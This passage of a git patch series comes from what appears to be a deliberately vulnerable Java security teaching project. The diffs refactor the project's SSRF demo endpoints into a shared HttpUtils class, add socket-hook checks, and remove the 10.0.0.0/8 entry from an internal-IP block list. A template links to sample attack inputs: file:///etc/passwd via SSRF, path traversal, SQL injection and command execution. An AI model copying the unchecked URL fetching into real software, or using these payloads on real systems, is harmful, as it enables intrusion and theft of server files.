 create mode 100644 src/main/java/org/joychou/util/HttpUtils.java

diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index e9c30d0e..12384717 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -1,19 +1,9 @@
 package org.joychou.controller;
 
-import com.squareup.okhttp.OkHttpClient;
-import org.apache.commons.httpclient.HttpClient;
-import org.apache.commons.httpclient.methods.GetMethod;
-import org.apache.commons.io.IOUtils;
-import org.apache.http.HttpResponse;
-import org.apache.http.HttpStatus;
-import org.apache.http.client.fluent.Request;
-import org.apache.http.client.methods.HttpGet;
-import org.apache.http.impl.client.CloseableHttpClient;
-import org.apache.http.impl.client.HttpClients;
 import org.joychou.security.SecurityUtil;
+import org.joychou.security.ssrf.SSRFException;
+import org.joychou.util.HttpUtils;
 import org.joychou.util.WebUtils;
-import org.jsoup.Jsoup;
-import org.jsoup.nodes.Document;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.RequestMapping;
@@ -21,8 +11,6 @@
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-
-import javax.imageio.ImageIO;
 import javax.servlet.http.HttpServletResponse;
 import java.io.*;
 import java.net.*;
@@ -40,58 +28,58 @@ public class SSRF {
 
     private static Logger logger = LoggerFactory.getLogger(SSRF.class);
 
-    @RequestMapping("/urlConnection")
-    public static String ssrf_URLConnection(@RequestParam String url) {
-        try {
-            URL u = new URL(url);
-            URLConnection urlConnection = u.openConnection();
-            BufferedReader in = new BufferedReader(new InputStreamReader(urlConnection.getInputStream())); //send request
-            String inputLine;
-            StringBuilder html = new StringBuilder();
 
-            while ((inputLine = in.readLine()) != null) {
-                html.append(inputLine);
-            }
-            in.close();
-            return html.toString();
-        } catch (Exception e) {
-            logger.error(e.toString());
-            return "fail";
+    @RequestMapping("/urlConnection/vuln")
+    public static String URLConnectionVuln(String url) {
+        return HttpUtils.URLConnection(url);
+    }
+
+
+    @RequestMapping("/urlConnection/sec")
+    public static String URLConnectionSec(String url) {
+
+        // Decline not http/https protocol
+        if (!url.startsWith("http://") && !url.startsWith("https://")) {
+            return "[-] SSRF check failed";
         }
+
+        try {
+            SecurityUtil.startSSRFHook();
+            return HttpUtils.URLConnection(url);
+        } catch (SSRFException | IOException e) {
+            return e.getMessage();
+        } finally {
+            SecurityUtil.stopSSRFHook();
+        }
+
     }
 
 
-    @RequestMapping("/HttpURLConnection")
+    @RequestMapping("/HttpURLConnection/sec")
     @ResponseBody
-    public static String ssrf_httpURLConnection(@RequestParam String url) {
+    public static String httpURLConnection(@RequestParam String url) {
         try {
-            URL u = new URL(url);
-            URLConnection urlConnection = u.openConnection();
-            HttpURLConnection httpUrl = (HttpURLConnection) urlConnection;
-            BufferedReader in = new BufferedReader(new InputStreamReader(httpUrl.getInputStream())); //send request
-            String inputLine;
-            StringBuilder html = new StringBuilder();
-
-            while ((inputLine = in.readLine()) != null) {
-                html.append(inputLine);
-            }
-            in.close();
-            return html.toString();
-        } catch (Exception e) {
-            logger.error(e.toString());
-            return "fail";
+            SecurityUtil.startSSRFHook();
+            return HttpUtils.HTTPURLConnection(url);
+        } catch (SSRFException | IOException e) {
+            return e.getMessage();
+        } finally {
+            SecurityUtil.stopSSRFHook();
         }
     }
 
 
-    @RequestMapping("/Request")
+    // http://localhost:8080/ssrf/request/sec?url=http://www.baidu.com
+    @RequestMapping("/request/sec")
     @ResponseBody
-    public static String ssrf_Request(@RequestParam String url) {
+    public static String request(@RequestParam String url) {
         try {
-            return Request.Get(url).execute().returnContent().toString();
-        } catch (Exception e) {
-            logger.error(e.toString());
-            return "fail";
+            SecurityUtil.startSSRFHook();
+            return HttpUtils.request(url);
+        } catch (SSRFException | IOException e) {
+            return e.getMessage();
+        } finally {
+            SecurityUtil.stopSSRFHook();
         }
     }
 
@@ -106,7 +94,7 @@ public static String ssrf_Request(@RequestParam String url) {
      */
     @RequestMapping("/openStream")
     @ResponseBody
-    public static void ssrf_openStream(@RequestParam String url, HttpServletResponse response) throws IOException {
+    public static void openStream(@RequestParam String url, HttpServletResponse response) throws IOException {
         InputStream inputStream = null;
         OutputStream outputStream = null;
         try {
@@ -136,164 +124,112 @@ public static void ssrf_openStream(@RequestParam String url, HttpServletResponse
     }
 
 
-    @RequestMapping("/ImageIO")
+    @RequestMapping("/ImageIO/sec")
     @ResponseBody
-    public static void ssrf_ImageIO(@RequestParam String url) {
+    public static String ImageIO(@RequestParam String url) {
         try {
-            URL u = new URL(url);
-            ImageIO.read(u); // send request
-        } catch (Exception e) {
-            logger.error(e.toString());
+            SecurityUtil.startSSRFHook();
+            HttpUtils.imageIO(url);
+        } catch (SSRFException | IOException e) {
+            return e.getMessage();
+        } finally {
+            SecurityUtil.stopSSRFHook();
         }
+
+        return "ImageIO ssrf test";
     }
 
 
-    @RequestMapping("/okhttp")
+    @RequestMapping("/okhttp/sec")
     @ResponseBody
-    public static void ssrf_okhttp(@RequestParam String url) throws IOException {
-        OkHttpClient client = new OkHttpClient();
-        com.squareup.okhttp.Request ok_http = new com.squareup.okhttp.Request.Builder().url(url).build();
-        client.newCall(ok_http).execute();
+    public static String okhttp(@RequestParam String url) {
+
+        try {
+            SecurityUtil.startSSRFHook();
+            HttpUtils.okhttp(url);
+        } catch (SSRFException | IOException e) {
+            return e.getMessage();
+        } finally {
+            SecurityUtil.stopSSRFHook();
+        }
+
+        return "okhttp ssrf test";
     }
 
 
     /**
-     * http://localhost:8080/ssrf/HttpClient/sec?url=http://www.baidu.com
-     *
-     * @return The response of url param.
+     * http://localhost:8080/ssrf/httpclient/sec?url=http://www.baidu.com
      */
-    @RequestMapping("/HttpClient/sec")
+    @RequestMapping("/httpclient/sec")
     @ResponseBody
-    public static String ssrf_HttpClient(@RequestParam String url) {
-        StringBuilder result = new StringBuilder();
+    public static String HttpClient(@RequestParam String url) {
+
         try {
             SecurityUtil.startSSRFHook();
-            CloseableHttpClient client = HttpClients.createDefault();
-            HttpGet httpGet = new HttpGet(url);
-            HttpResponse httpResponse = client.execute(httpGet); // send request
-            BufferedReader rd = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));
-
-            String line;
-            while ((line = rd.readLine()) != null) {
-                result.append(line);
-            }
-
-            // SecurityUtil.stopSSRFHook();
-            return result.toString();
-
-        } catch (Exception e) {
-            return e.toString();
+            return HttpUtils.httpClient(url);
+        } catch (SSRFException | IOException e) {
+            return e.getMessage();
         } finally {
             SecurityUtil.stopSSRFHook();
         }
+
     }
 
 
     /**
-     * https://mvnrepository.com/artifact/commons-httpclient/commons-httpclient
-     * UserAgent: Jakarta Commons-HttpClient/3.1 (2007.08 publish)
-     * <p>
      * http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com
      */
     @RequestMapping("/commonsHttpClient/sec")
     @ResponseBody
     public static String commonsHttpClient(@RequestParam String url) {
-        if (!SecurityUtil.checkSSRFByWhitehosts(url)) {
-            return "Bad man. I got u.";
-        }
-
-        HttpClient client = new HttpClient();
-        GetMethod method = new GetMethod(url);
-        method.setFollowRedirects(false);
 
         try {
-            // Send http request.
-            int status_code = client.executeMethod(method);
-
-            // Only allow the url that status_code is 200.
-            if (status_code != HttpStatus.SC_OK) {
-                return "Method failed: " + method.getStatusLine();
-            }
-
-            // Read the response body.
-            byte[] resBody = method.getResponseBody();
-            return new String(resBody);
-
-        } catch (IOException e) {
-            return "Error: " + e.getMessage();
+            SecurityUtil.startSSRFHook();
+            return HttpUtils.commonHttpClient(url);
+        } catch (SSRFException | IOException e) {
+            return e.getMessage();
         } finally {
-            // Release the connection.
-            method.releaseConnection();
+            SecurityUtil.stopSSRFHook();
         }
 
-
     }
 
     /**
-     * jsoup是一款Java的HTML解析器，可直接解析某个URL地址、HTML文本内容。
-     * <p>
      * http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com
      */
-    @RequestMapping("/Jsoup")
+    @RequestMapping("/Jsoup/sec")
     @ResponseBody
     public static String Jsoup(@RequestParam String url) {
+
         try {
-            Document doc = Jsoup.connect(url)
-                    .userAgent(
-                            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) "
-                                    + "Chrome/64.0.3282.167 Safari/537.36")
-                    .timeout(3000)
-                    .cookie("name", "joychou") // request请求带的cookie
-                    .followRedirects(false)
-                    .execute().parse();
-            logger.info(doc.html());
-        } catch (MalformedURLException e) {
-            return "exception: " + e.toString();
-        } catch (IOException e) {
-            logger.error(e.toString());
-            return "exception: " + e.toString();
+            SecurityUtil.startSSRFHook();
+            return HttpUtils.Jsoup(url);
+        } catch (SSRFException | IOException e) {
+            return e.getMessage();
+        } finally {
+            SecurityUtil.stopSSRFHook();
         }
 
-        return "Jsoup ssrf";
     }
 
 
     /**
-     * 用途：IOUtils可远程获取URL图片
-     * 默认重定向：是
-     * 封装类：URLConnection
-     * http://localhost:8080/ssrf/IOUtils?url=http://www.baidu.com
+     * http://localhost:8080/ssrf/IOUtils/sec?url=http://www.baidu.com
      */
-    @RequestMapping("/IOUtils")
-    public static String IOUtils(@RequestParam String url) {
+    @RequestMapping("/IOUtils/sec")
+    public static String IOUtils(String url) {
+
         try {
-            // IOUtils.toByteArray内部用URLConnection进行了封装
-            IOUtils.toByteArray(URI.create(url));
-        } catch (Exception e) {
-            return "exception: " + e.toString();
+            SecurityUtil.startSSRFHook();
+            HttpUtils.IOUtils(url);
+        } catch (SSRFException | IOException e) {
+            return e.getMessage();
+        } finally {
+            SecurityUtil.stopSSRFHook();
         }
 
-        return "IOUtils ssrf";
+        return "IOUtils ssrf test";
     }
 
 
-    /**
-     * Safe code.
-     * http://localhost:8080/ssrf/ImageIO/sec?url=http://www.baidu.com
-     */
-    @RequestMapping("/ImageIO/sec")
-    public static String ImageIOSec(@RequestParam String url) {
-        try {
-            URL u = new URL(url);
-            if (!SecurityUtil.checkSSRFWithoutRedirect(url)) {
-                logger.error("[-] SSRF check failed. Original Url: " + url);
-                return "SSRF check failed.";
-            }
-            ImageIO.read(u); // send request
-        } catch (Exception e) {
-            return e.toString();
-        }
-
-        return "ImageIO ssrf safe code.";
-    }
 }
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index a1c4cfc6..0b383f5d 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -126,7 +126,7 @@ public static boolean checkSSRFWithoutRedirect(String url) {
      *
      * @author liergou @ 2020-04-04 02:15
      */
-    public static void startSSRFHook() throws NoSuchFieldException, IOException {
+    public static void startSSRFHook() throws IOException {
         SocketHook.startHook();
     }
 
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 32373aff..3860cad9 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -132,7 +132,6 @@ static boolean isInternalIp(String strIP) {
         }
 
         ArrayList<String> blackSubnets = WebConfig.getSsrfBlockIps();
-        blackSubnets.add("10.0.0.0/8");
         for (String subnet : blackSubnets) {
             SubnetUtils utils = new SubnetUtils(subnet);
             if (utils.getInfo().isInRange(strIP)) {
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFException.java b/src/main/java/org/joychou/security/ssrf/SSRFException.java
index b27a970f..817c881e 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFException.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFException.java
@@ -6,7 +6,7 @@
  *
  * @author JoyChou @2020-04-04
  */
-class SSRFException extends RuntimeException {
+public class SSRFException extends RuntimeException {
 
     SSRFException(String s) {
         super(s);
diff --git a/src/main/java/org/joychou/security/ssrf/SocketHook.java b/src/main/java/org/joychou/security/ssrf/SocketHook.java
index 92b8f496..4ce3509c 100644
--- a/src/main/java/org/joychou/security/ssrf/SocketHook.java
+++ b/src/main/java/org/joychou/security/ssrf/SocketHook.java
@@ -12,7 +12,7 @@
  */
 public class SocketHook {
 
-    public static void startHook() throws NoSuchFieldException, IOException {
+    public static void startHook() throws IOException {
         SocketHookFactory.initSocket();
         SocketHookFactory.setHook(true);
         try{
diff --git a/src/main/java/org/joychou/security/ssrf/SocketHookFactory.java b/src/main/java/org/joychou/security/ssrf/SocketHookFactory.java
index 51a278b7..dc6d951d 100644
--- a/src/main/java/org/joychou/security/ssrf/SocketHookFactory.java
+++ b/src/main/java/org/joychou/security/ssrf/SocketHookFactory.java
@@ -33,22 +33,23 @@ static void setHook(Boolean set) {
     }
 
 
-    /**
-     * initSocket
-     */
     static void initSocket() {
+
         if (socketConstructor != null) {
             return;
         }
 
         Socket socket = new Socket();
         try {
+            // get impl field in Socket class
             Field implField = Socket.class.getDeclaredField("impl");
             implField.setAccessible(true);
             Class<?> clazz = implField.get(socket).getClass();
+
             SocketHookImpl.initSocketImpl(clazz);
             socketConstructor = clazz.getDeclaredConstructor();
             socketConstructor.setAccessible(true);
+
         } catch (NoSuchFieldException | IllegalAccessException | NoSuchMethodException e) {
             throw new SSRFException("SocketHookFactory init failed!");
         }
diff --git a/src/main/java/org/joychou/security/ssrf/SocketHookImpl.java b/src/main/java/org/joychou/security/ssrf/SocketHookImpl.java
index c3b9c28d..de244134 100644
--- a/src/main/java/org/joychou/security/ssrf/SocketHookImpl.java
+++ b/src/main/java/org/joychou/security/ssrf/SocketHookImpl.java
@@ -4,7 +4,6 @@
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
-import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
 import java.lang.reflect.Constructor;
@@ -21,21 +20,22 @@
 public class SocketHookImpl extends SocketImpl implements SocketOptions {
 
     private static Boolean isInit = false;
-    static private SocketImpl socketImpl = null;
-    static private Method createImpl;
-    static private Method connectHostImpl;
-    static private Method connectInetAddressImpl;
-    static private Method connectSocketAddressImpl;
-    static private Method bindImpl;
-    static private Method listenImpl;
-    static private Method acceptImpl;
-    static private Method getInputStreamImpl;
-    static private Method getOutputStreamImpl;
-    static private Method availableImpl;
-    static private Method closeImpl;
-    static private Method shutdownInputImpl;
-    static private Method shutdownOutputImpl;
-    static private Method sendUrgentDataImpl;
+
+    private static SocketImpl socketImpl = null;
+    private static Method createImpl;
+    private static Method connectHostImpl;
+    private static Method connectInetAddressImpl;
+    private static Method connectSocketAddressImpl;
+    private static Method bindImpl;
+    private static Method listenImpl;
+    private static Method acceptImpl;
+    private static Method getInputStreamImpl;
+    private static Method getOutputStreamImpl;
+    private static Method availableImpl;
+    private static Method closeImpl;
+    private static Method shutdownInputImpl;
+    private static Method shutdownOutputImpl;
+    private static Method sendUrgentDataImpl;
 
     private final Logger logger = LoggerFactory.getLogger(this.getClass());
 
@@ -58,8 +58,12 @@ static void initSocketImpl(Class<?> initSocketImpl) {
             throw new RuntimeException("InitSocketImpl failed! Hook stopped!");
         }
 
+//        try {
+//            initSocketImpl = Class.forName("java.net.SocketImpl");
+//        } catch (ClassNotFoundException e) {
+//            System.out.println(e.getMessage());
+//        }
         if (!isInit) {
-            //
             createImpl = SocketHookUtils.findMethod(initSocketImpl, "create", new Class<?>[]{boolean.class});
             connectHostImpl = SocketHookUtils.findMethod(initSocketImpl, "connect", new Class<?>[]{String.class, int.class});
             connectInetAddressImpl = SocketHookUtils.findMethod(initSocketImpl, "connect", new Class<?>[]{InetAddress.class, int.class});
@@ -83,7 +87,7 @@ static void initSocketImpl(Class<?> initSocketImpl) {
      * socket base method impl
      */
     @Override
-    protected void create(boolean stream) throws IOException {
+    protected void create(boolean stream) {
         try {
             createImpl.invoke(socketImpl, stream);
         } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
@@ -94,7 +98,7 @@ protected void create(boolean stream) throws IOException {
 
 
     @Override
-    protected void connect(String host, int port) throws IOException {
+    protected void connect(String host, int port) {
         logger.info("host: " + host + "\tport: " + port);
         try {
             connectHostImpl.invoke(socketImpl, host, port);
@@ -106,7 +110,7 @@ protected void connect(String host, int port) throws IOException {
 
 
     @Override
-    protected void connect(InetAddress address, int port) throws IOException {
+    protected void connect(InetAddress address, int port) {
 
         logger.info("InetAddress: " + address.toString());
 
@@ -121,14 +125,14 @@ protected void connect(InetAddress address, int port) throws IOException {
     }
 
     @Override
-    protected void connect(SocketAddress address, int timeout) throws IOException {
+    protected void connect(SocketAddress address, int timeout) {
 
         // convert SocketAddress to InetSocketAddress
         InetSocketAddress addr = (InetSocketAddress) address;
 
         String ip = addr.getAddress().getHostAddress();
         String host = addr.getHostName();
-        logger.info(String.format("[+]SocketAddress address's Hostname: %s IP: %s", host, ip));
+        logger.info(String.format("[+] SocketAddress address's Hostname: %s IP: %s", host, ip));
 
         try {
             if (SSRFChecker.isInternalIp(ip)) {
@@ -143,7 +147,7 @@ protected void connect(SocketAddress address, int timeout) throws IOException {
     }
 
     @Override
-    protected void bind(InetAddress host, int port) throws IOException {
+    protected void bind(InetAddress host, int port) {
         try {
             bindImpl.invoke(socketImpl, host, port);
         } catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex) {
@@ -162,7 +166,7 @@ protected void listen(int backlog) {
     }
 
     @Override
-    protected void accept(SocketImpl s) throws IOException {
+    protected void accept(SocketImpl s) {
 
         try {
             acceptImpl.invoke(socketImpl, s);
@@ -172,7 +176,7 @@ protected void accept(SocketImpl s) throws IOException {
     }
 
     @Override
-    protected InputStream getInputStream() throws IOException {
+    protected InputStream getInputStream() {
         InputStream inStream = null;
 
         try {
@@ -186,7 +190,7 @@ protected InputStream getInputStream() throws IOException {
     }
 
     @Override
-    protected OutputStream getOutputStream() throws IOException {
+    protected OutputStream getOutputStream() {
         OutputStream outStream = null;
 
         try {
@@ -200,7 +204,7 @@ protected OutputStream getOutputStream() throws IOException {
     }
 
     @Override
-    protected int available() throws IOException {
+    protected int available() {
 
         int result = -1;
 
@@ -214,7 +218,7 @@ protected int available() throws IOException {
     }
 
     @Override
-    protected void close() throws IOException {
+    protected void close() {
         try {
             closeImpl.invoke(socketImpl);
         } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
@@ -223,7 +227,7 @@ protected void close() throws IOException {
     }
 
     @Override
-    protected void shutdownInput() throws IOException {
+    protected void shutdownInput() {
         try {
             shutdownInputImpl.invoke(socketImpl);
         } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
@@ -233,7 +237,7 @@ protected void shutdownInput() throws IOException {
     }
 
     @Override
-    protected void shutdownOutput() throws IOException {
+    protected void shutdownOutput() {
         try {
             shutdownOutputImpl.invoke(socketImpl);
         } catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException ex) {
@@ -243,7 +247,7 @@ protected void shutdownOutput() throws IOException {
     }
 
     @Override
-    protected void sendUrgentData(int data) throws IOException {
+    protected void sendUrgentData(int data) {
         try {
             sendUrgentDataImpl.invoke(socketImpl, data);
         } catch (IllegalAccessException | InvocationTargetException | IllegalArgumentException ex) {
diff --git a/src/main/java/org/joychou/security/ssrf/SocketHookUtils.java b/src/main/java/org/joychou/security/ssrf/SocketHookUtils.java
index b94b82d9..00f6c275 100644
--- a/src/main/java/org/joychou/security/ssrf/SocketHookUtils.java
+++ b/src/main/java/org/joychou/security/ssrf/SocketHookUtils.java
@@ -6,23 +6,22 @@ class SocketHookUtils {
 
     /**
      * Poll the parent class to find the reflection method.
+     * SocksSocketImpl -> PlainSocketImpl -> AbstractPlainSocketImpl
      *
      * @author liergou @2020-04-04 01:43
      */
-    static Method findMethod(Class<?> inputClazz, String findName, Class<?>[] args) {
+    static Method findMethod(Class<?> clazz, String findName, Class<?>[] args) {
 
-        Class<?> temp = inputClazz;
-
-        while (temp != null) {
+        while (clazz != null) {
             try {
-                Method tmpMethod = temp.getDeclaredMethod(findName, args);
-                tmpMethod.setAccessible(true);
-                return tmpMethod;
+                Method method = clazz.getDeclaredMethod(findName, args);
+                method.setAccessible(true);
+                return method;
             } catch (NoSuchMethodException e) {
-                temp = temp.getSuperclass();
+                clazz = clazz.getSuperclass();
             }
         }
         return null;
     }
 
-}
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
new file mode 100644
index 00000000..37eeb69a
--- /dev/null
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -0,0 +1,189 @@
+package org.joychou.util;
+
+import com.squareup.okhttp.OkHttpClient;
+import org.apache.commons.httpclient.HttpClient;
+import org.apache.commons.httpclient.methods.GetMethod;
+import org.apache.commons.io.IOUtils;
+import org.apache.http.HttpResponse;
+import org.apache.http.client.fluent.Request;
+import org.apache.http.client.methods.HttpGet;
+import org.apache.http.impl.client.CloseableHttpClient;
+import org.apache.http.impl.client.HttpClients;
+import org.jsoup.Jsoup;
+import org.jsoup.nodes.Document;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+import javax.imageio.ImageIO;
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.net.HttpURLConnection;
+import java.net.URI;
+import java.net.URL;
+import java.net.URLConnection;
+
+/**
+ * @author JoyChou 2020-04-06
+ */
+public class HttpUtils {
+
+    private static Logger logger = LoggerFactory.getLogger(HttpUtils.class);
+
+
+    /**
+     * https://mvnrepository.com/artifact/commons-httpclient/commons-httpclient
+     * UserAgent is <code>Jakarta Commons-HttpClient/3.1</code>. Last publish at 2007.08.
+     *
+     * @param url http request url
+     * @return response
+     */
+    public static String commonHttpClient(String url) {
+
+        HttpClient client = new HttpClient();
+        GetMethod method = new GetMethod(url);
+
+        try {
+            client.executeMethod(method); // send request
+            byte[] resBody = method.getResponseBody();
+            return new String(resBody);
+
+        } catch (IOException e) {
+            return "Error: " + e.getMessage();
+        } finally {
+            // Release the connection.
+            method.releaseConnection();
+        }
+    }
+
+
+    public static String request(String url) {
+        try {
+            return Request.Get(url).execute().returnContent().toString();
+        } catch (Exception e) {
+            return e.getMessage();
+        }
+    }
+
+
+    public static String httpClient(String url) {
+
+        StringBuilder result = new StringBuilder();
+
+        try {
+
+            CloseableHttpClient client = HttpClients.createDefault();
+            HttpGet httpGet = new HttpGet(url);
+            HttpResponse httpResponse = client.execute(httpGet); // send request
+            BufferedReader rd = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));
+
+            String line;
+            while ((line = rd.readLine()) != null) {
+                result.append(line);
+            }
+
+            return result.toString();
+
+        } catch (Exception e) {
+            return e.getMessage();
+        }
+    }
+
+
+    public static String URLConnection(String url) {
+        try {
+            URL u = new URL(url);
+            URLConnection urlConnection = u.openConnection();
+            BufferedReader in = new BufferedReader(new InputStreamReader(urlConnection.getInputStream())); //send request
+            String inputLine;
+            StringBuilder html = new StringBuilder();
+
+            while ((inputLine = in.readLine()) != null) {
+                html.append(inputLine);
+            }
+            in.close();
+            return html.toString();
+        } catch (Exception e) {
+            logger.error(e.getMessage());
+            return e.getMessage();
+        }
+    }
+
+
+    public static String HTTPURLConnection(String url) {
+        try {
+            URL u = new URL(url);
+            URLConnection urlConnection = u.openConnection();
+            HttpURLConnection httpUrl = (HttpURLConnection) urlConnection;
+            BufferedReader in = new BufferedReader(new InputStreamReader(httpUrl.getInputStream())); //send request
+            String inputLine;
+            StringBuilder html = new StringBuilder();
+
+            while ((inputLine = in.readLine()) != null) {
+                html.append(inputLine);
+            }
+            in.close();
+            return html.toString();
+        } catch (IOException e) {
+            logger.error(e.getMessage());
+            return e.getMessage();
+        }
+    }
+
+
+    /**
+     * Jsoup is a HTML parser about Java.
+     *
+     * @param url http request url
+     */
+    public static String Jsoup(String url) {
+        try {
+            String useragent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) " +
+                    "Chrome/64.0.3282.167 Safari/537.36";
+            Document doc = Jsoup.connect(url)
+                    .userAgent(useragent)
+                    .timeout(3000)
+                    .cookie("name", "joychou") // request cookies
+                    //.followRedirects(false)
+                    .execute().parse();
+            return doc.outerHtml();
+        } catch (IOException e) {
+            return e.getMessage();
+        }
+    }
+
+
+    public static void okhttp(String url) throws IOException {
+        OkHttpClient client = new OkHttpClient();
+        com.squareup.okhttp.Request ok_http = new com.squareup.okhttp.Request.Builder().url(url).build();
+        client.newCall(ok_http).execute();
+    }
+
+
+    public static void imageIO(String url) {
+        try {
+            URL u = new URL(url);
+            ImageIO.read(u); // send request
+        } catch (IOException e) {
+            logger.error(e.getMessage());
+        }
+
+    }
+
+
+    /**
+     * IOUtils which is wrapped by URLConnection can get remote pictures.
+     * The default setting of redirection is true.
+     *
+     * @param url http request url
+     */
+    public static void IOUtils(String url) {
+        try {
+            IOUtils.toByteArray(URI.create(url));
+        } catch (IOException e) {
+            logger.error(e.getMessage());
+        }
+    }
+
+
+}
diff --git a/src/main/java/org/joychou/util/WebUtils.java b/src/main/java/org/joychou/util/WebUtils.java
index 7cc16e84..4816df8e 100644
--- a/src/main/java/org/joychou/util/WebUtils.java
+++ b/src/main/java/org/joychou/util/WebUtils.java
@@ -17,6 +17,7 @@ public static String getRequestBody(HttpServletRequest request) throws IOExcepti
         return convertStreamToString(in);
     }
 
+
     // https://stackoverflow.com/questions/309424/how-do-i-read-convert-an-inputstream-into-a-string-in-java
     public static String convertStreamToString(java.io.InputStream is) {
         java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");
@@ -33,6 +34,7 @@ public static String json2Jsonp(String callback, String jsonStr) {
         return HtmlUtils.htmlEscape(callback) + "(" + jsonStr + ")";
     }
 
+
     public static String getFileExtension(String fullName) {
         Preconditions.checkNotNull(fullName);
         String fileName = (new File(fullName)).getName();
@@ -40,10 +42,13 @@ public static String getFileExtension(String fullName) {
         return dotIndex == -1 ? "" : fileName.substring(dotIndex + 1);
     }
 
+
     public static String getNameWithoutExtension(String file) {
         Preconditions.checkNotNull(file);
         String fileName = (new File(file)).getName();
         int dotIndex = fileName.lastIndexOf('.');
         return dotIndex == -1 ? fileName : fileName.substring(0, dotIndex);
     }
+
+
 }
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index de32f6ee..671045d5 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -14,7 +14,7 @@
         <a th:href="@{cors/sec/originFilter}">Cors</a>&nbsp;&nbsp;
         <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
         <a th:href="@{sqli/mybatis/vuln01?username=joychou' or '1'='1}">SqlInject</a>&nbsp;&nbsp;
-        <a th:href="@{/ssrf/urlConnection?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;
+        <a th:href="@{/ssrf/urlConnection/vuln?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;
         <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
         <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
         <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>

From f296f0dd927f6ecd35543bfa5f0a504f11a6992d Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 10 Apr 2020 19:08:26 +0800
Subject: [PATCH 080/108] add swagger-ui & ssrf of httpsyncclient

---
 java-sec-code.iml                             |  19 +++-
 pom.xml                                       |  24 +++-
 .../org/joychou/config/SwaggerConfig.java     |  31 ++++++
 .../java/org/joychou/controller/Cookies.java  |  13 ++-
 .../java/org/joychou/controller/Cors.java     |  25 +++--
 .../java/org/joychou/controller/Fastjson.java |   2 +-
 .../org/joychou/controller/GetRequestURI.java |   3 +-
 src/main/java/org/joychou/controller/Rce.java |   5 +-
 .../java/org/joychou/controller/SSRF.java     | 105 ++++++++++++------
 .../java/org/joychou/controller/SpEL.java     |   3 +-
 .../java/org/joychou/controller/Test.java     |  14 ++-
 .../org/joychou/controller/URLWhiteList.java  |  53 +++++----
 src/main/java/org/joychou/controller/XXE.java |   2 +-
 .../org/joychou/security/SecurityUtil.java    |  36 +++++-
 .../joychou/security/ssrf/SSRFChecker.java    |  15 +--
 .../joychou/security/ssrf/SocketHookImpl.java |   7 +-
 src/main/java/org/joychou/util/HttpUtils.java |  38 +++++--
 src/main/resources/application.properties     |   7 +-
 18 files changed, 273 insertions(+), 129 deletions(-)
 create mode 100644 src/main/java/org/joychou/config/SwaggerConfig.java

diff --git a/java-sec-code.iml b/java-sec-code.iml
index c9e18a68..720895cc 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -49,7 +49,6 @@
     <orderEntry type="library" name="Maven: org.hibernate:hibernate-validator:5.3.4.Final" level="project" />
     <orderEntry type="library" name="Maven: javax.validation:validation-api:1.1.0.Final" level="project" />
     <orderEntry type="library" name="Maven: org.jboss.logging:jboss-logging:3.3.0.Final" level="project" />
-    <orderEntry type="library" name="Maven: com.fasterxml:classmate:1.3.3" level="project" />
     <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.8.6" level="project" />
     <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.8.0" level="project" />
     <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.8.6" level="project" />
@@ -76,7 +75,7 @@
     <orderEntry type="library" name="Maven: org.codehaus.mojo:animal-sniffer-annotations:1.14" level="project" />
     <orderEntry type="library" name="Maven: commons-collections:commons-collections:3.1" level="project" />
     <orderEntry type="library" name="Maven: commons-lang:commons-lang:2.4" level="project" />
